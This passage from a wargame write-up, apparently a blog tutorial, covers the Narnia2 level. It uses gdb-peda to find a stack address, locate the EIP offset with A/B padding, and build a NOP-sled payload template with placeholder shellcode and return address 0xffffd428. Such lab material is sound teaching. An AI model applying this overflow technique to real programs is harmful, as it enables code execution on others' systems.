EIP holds the address of the next instruction to execute.<\/p>\n<p>So as soon as that value is loaded into EIP, our code runs.<\/p>\n<p>To determine the return address, we can use <code>peda-gdb<\/code> again.<\/p>\n<p>\u00a0<\/p>\n<p>Start it and load the binary with the <code>file<\/code> command:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9d37c56 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9d37c56\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d90d7b8\" data-id=\"d90d7b8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d0c3522 elementor-widget elementor-widget-code-highlight\" data-id=\"d0c3522\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>file \/narnia\/narnia2<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fbe9448 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fbe9448\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-394e41e\" data-id=\"394e41e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6ac34f6 elementor-widget elementor-widget-text-editor\" data-id=\"6ac34f6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Set the program's arguments:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-42efedf elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"42efedf\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-784176a\" data-id=\"784176a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-610989b elementor-widget elementor-widget-code-highlight\" data-id=\"610989b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"\\x90\"*150)')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-de51068 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"de51068\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2fa3b12\" data-id=\"2fa3b12\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-101d03c elementor-widget elementor-widget-text-editor\" data-id=\"101d03c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This argument is 150 <code>\\x90<\/code> bytes, i.e. 150 <strong>NOP<\/strong> (<strong>No Operation<\/strong>) instructions; a run of them forms a sled that execution slides along until it reaches whatever follows.<\/p>\n<p>\u00a0<\/p>\n<p>Add a <strong>breakpoint<\/strong> so we can step through the program and watch what happens:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ff058e9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ff058e9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-04ddf1d\" data-id=\"04ddf1d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6685a8e elementor-widget elementor-widget-code-highlight\" data-id=\"6685a8e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>break *main+68<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-394d1f1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"394d1f1\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-533fbe7\" data-id=\"533fbe7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b449e6 elementor-widget elementor-widget-text-editor\" data-id=\"1b449e6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Run the program:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section 
class=\"elementor-section elementor-top-section elementor-element elementor-element-bacb281 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bacb281\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f9d15eb\" data-id=\"f9d15eb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-86afc40 elementor-widget elementor-widget-code-highlight\" data-id=\"86afc40\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>run<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0e74689 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0e74689\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5dd4c69\" data-id=\"5dd4c69\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-99359ba elementor-widget 
elementor-widget-text-editor\" data-id=\"99359ba\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le programme d\u00e9file jusqu\u2019au prochain <strong>breakpoint.<\/strong><\/p>\n<p>\u00a0<\/p>\n<p>Afficher le contenu de la pile, afin de connaitre l\u2019adresse de retour que l\u2019on pourra utiliser :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f139344 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f139344\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-91f015f\" data-id=\"91f015f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3517fcd elementor-widget elementor-widget-code-highlight\" data-id=\"3517fcd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>x\/100x $esp<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-eaa6449 elementor-section-boxed 
elementor-section-height-default elementor-section-height-default\" data-id=\"eaa6449\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-060a5f7\" data-id=\"060a5f7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c38b25d elementor-widget elementor-widget-text-editor\" data-id=\"c38b25d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p>The first <code>x<\/code> stands for \u201cE<strong>x<\/strong>amine memory\u201d.<\/p>\n<\/blockquote>\n<blockquote>\n<p><code>\/100x<\/code> means \u201cdisplay the next 100 values in hexadecimal\u201d.<\/p>\n<\/blockquote>\n<p>Here is the result:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-afac605 elementor-widget elementor-widget-code-highlight\" data-id=\"afac605\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>gdb-peda$ x\/100x $esp\r\n0xffffd400:     0x0804a01c      0xffffd408      0x90909090      0x90909090\r\n0xffffd410:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd420:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd430:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd440:     0x90909090      
0x90909090      0x90909090      0x90909090\r\n0xffffd450:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd460:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd470:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd480:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd490:     0x90909090      0x90909090      0x90909090      0xff009090\r\n0xffffd4a0:     0xf7fab000      0x08049196      0x00000002      0xffffd544\r\n0xffffd4b0:     0xf7fab000      0xffffd544      0xf7ffcb80      0xf7ffd020\r\n0xffffd4c0:     0x89760a03      0xc2968013      0x00000000      0x00000000\r\n0xffffd4d0:     0x00000000      0xf7ffcb80      0xf7ffd020      0xd8e42900\r\n0xffffd4e0:     0xf7ffda40      0xf7da24a6      0xf7fab000      0xf7da25f3\r\n0xffffd4f0:     0x00000000      0x0804b0d8      0xffffd550      0xf7ffd020\r\n0xffffd500:     0x00000000      0xf7fd8ff4      0xf7da256d      0x0804b1c8\r\n0xffffd510:     0x00000002      0x08049080      0x00000000      0x080490ac\r\n0xffffd520:     0x08049196      0x00000002      0xffffd544      0x00000000\r\n0xffffd530:     0x00000000      0xf7fcaaa0      0xffffd53c      0xf7ffda40\r\n0xffffd540:     0x00000002      0xffffd696      0xffffd6a6      0x00000000\r\n0xffffd550:     0xffffd73d      0xffffd74d      0xffffd75f      0xffffd76f\r\n0xffffd560:     0xffffd784      0xffffd793      0xffffd79c      0xffffd7af\r\n0xffffd570:     0xffffd7bc      0xffffddab      0xffffddb6      0xffffddeb\r\n0xffffd580:     0xffffde0d      0xffffde24      0xffffde2f      0xffffde4f<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2dfe2a8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2dfe2a8\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f44b543\" data-id=\"f44b543\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b0891d elementor-widget elementor-widget-text-editor\" data-id=\"8b0891d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We can see a block of &#8220;\\x90&#8221; running from address\u00a0<span style=\"font-family: monospace;font-size: 18px\">0xffffd400\u00a0<\/span>to\u00a0<span style=\"font-family: monospace;font-size: 18px\">0xffffd490 <\/span>which is our injected payload.<\/p>\n<p>You can pick a return address anywhere in this range, in the middle of the NOPs. 
For my part, I chose <code>0xffffd428<\/code>.<\/p>\n<p>Press the \u2018<code>n<\/code>\u2019 key to step to the next instruction and keep exploring the code if you wish.<\/p>\n<p>You now have all the ingredients to build your payload.<\/p>\n<p>All that is left is to find the <b>right number of NOPs<\/b> so that EIP actually takes the value of the intended return address.<\/p>\n<p>To do that, you can experiment in peda by passing large quantities of A\u2019s and B\u2019s until you find the right amount.<\/p>\n<p>For example:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-aabb873 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"aabb873\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d13d25f\" data-id=\"d13d25f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ae64145 elementor-widget elementor-widget-code-highlight\" data-id=\"ae64145\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"A\"*150 + 
\"BBBB\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cd5e518 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cd5e518\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d0aea3f\" data-id=\"d0aea3f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c99d992 elementor-widget elementor-widget-image\" data-id=\"c99d992\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"190\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2.png\" class=\"attachment-large size-large wp-image-562\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2.png 643w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2-300x89.png 300w\" sizes=\"(max-width: 643px) 100vw, 643px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ab13411 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ab13411\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container 
elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7b8470f\" data-id=\"7b8470f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6658f2b elementor-widget elementor-widget-text-editor\" data-id=\"6658f2b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Here, EIP = \u2018AAAA\u2019, which means there are too many \u2018A\u2019s.<\/p>\n<p>Keep going like this until EIP equals \u2018BBBB\u2019.<\/p>\n<p>Once that is the case, replace the \u2018A\u2019s with NOPs + the shellcode, and the B\u2019s with the return address.<\/p>\n<p>\u00a0<\/p>\n<p>You will end up with a payload of this form:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fccdf19 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fccdf19\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2fc052d\" data-id=\"2fc052d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-365f2cf elementor-widget elementor-widget-code-highlight\" data-id=\"365f2cf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"\\x90\"*X + \"shellcode\" + \"\\x28\\xd4\\xff\\xff\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3c72dbb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3c72dbb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-33c4639\" data-id=\"33c4639\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-523492d elementor-widget elementor-widget-text-editor\" data-id=\"523492d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>where X = the size found with the A\u2019s minus the length of the shellcode<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-11f5bc6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"11f5bc6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column 
elementor-col-100 elementor-top-column elementor-element elementor-element-6c841e5\" data-id=\"6c841e5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1ab2756 elementor-widget elementor-widget-text-editor\" data-id=\"1ab2756\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><span class=\"notion-enable-hover\" data-token-index=\"0\"><b>Note<\/b><\/span><span class=\"notion-enable-hover\" data-token-index=\"1\"><b> <\/b>: It is advisable to add a few NOPs after the shellcode to avoid any glitches. This has to be taken into account in the calculation.<\/span><\/p>\n<\/blockquote>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fd6b85c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fd6b85c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f91a103\" data-id=\"f91a103\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1c62d24 elementor-widget elementor-widget-heading\" data-id=\"1c62d24\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title 
elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-49beb7b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"49beb7b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-99d9bb9\" data-id=\"99d9bb9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c224e53 elementor-widget elementor-widget-text-editor\" data-id=\"c224e53\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Congratulations if you completed the challenge! \ud83e\udd73<\/p>\n<p>If not, don\u2019t get discouraged. 
This is a complex challenge, which requires a good understanding of assembly as well as of how the stack works.<\/p>\n<p>Whatever happens, I\u2019m sure you will come out of this challenge with new skills, as was the case for me \ud83d\ude0a<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2a0313f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2a0313f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6e43e5a\" data-id=\"6e43e5a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-670e77b elementor-widget elementor-widget-heading\" data-id=\"670e77b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Resources<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-060df78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"060df78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2980dc9\" 
